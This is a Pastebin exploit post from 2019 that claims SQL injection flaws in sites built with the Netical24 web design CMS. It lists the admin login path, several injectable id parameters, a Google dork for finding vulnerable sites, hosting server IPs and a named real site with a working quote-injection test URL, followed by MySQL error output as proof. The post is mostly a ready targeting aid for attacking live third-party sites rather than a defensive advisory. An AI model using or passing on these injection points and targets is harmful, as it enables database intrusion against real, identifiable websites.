API tools faq
paste
KingSkrupellos

Netical24 Web Design SQL Injection

KingSkrupellos
Jan 9th, 2019
72
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.10 KB | None | 0 0
raw download clone embed print report
  1. ######################################################
  2.  
  3. # Exploit Title : Netical24 Web Design SQL Injection Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 10/01/2019
  7. # Vendor Homepage : netical24.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : Diseño y Desarrollo Web:Netical24
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. # Cyberizm Exploit Reference Link :
  15. cyberizm.org/cyberizm-netical24-web-design-sql-injection-vulnerability.html
  16.  
  17. ######################################################
  18.  
  19. # Admin Panel Login Path :
  20. *************************
  21.  
  22. /admin
  23.  
  24. # SQL Injection Exploit :
  25. ***********************
  26.  
  27. /ver_noticia.php?id=[SQL Injection]
  28.  
  29. /ver_documento.php?id=[SQL Injection]
  30.  
  31. /ver_convenio.php?id=[SQL Injection]
  32.  
  33. /ver_noticia.php?id=[SQL Injection]
  34.  
  35. /ver_circular.php?id=[SQL Injection]
  36.  
  37. /ver_evento.php?id=[SQL Injection]
  38.  
  39. /ver_convenio.php?id=[SQL Injection]
  40.  
  41. /formacion.php?t=[SQL Injection]
  42.  
  43. ######################################################
  44.  
  45. # Example Vulnerable Site :
  46. *************************
  47.  
  48. Note : (212.18.224.226) => There are 148 domains hosted on this server.
  49.  
  50. Note : (109.73.169.144) => There are 132 domains hosted on this server.
  51.  
  52. [+] trabajosocialleon.org/ver_noticia.php?id=93%27 =>
  53.  
  54. [ Proof of Concept ] => archive.fo/ZnYWd
  55.  
  56. ######################################################
  57.  
  58. # SQL Database Error :
  59. **********************
  60. You have an error in your SQL syntax; check the manual that
  61. corresponds to your MySQL server version for
  62. the right syntax to use near '\'' at line 1
  63.  
  64. You have an error in your SQL syntax; check the manual that corresponds
  65. to your MySQL server version for the right syntax to use near '\' AND
  66. public=1 AND finalizado=0 ORDER BY fecha DESC' at line 1
  67.  
  68. ######################################################
  69.  
  70. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  71.  
  72. ######################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!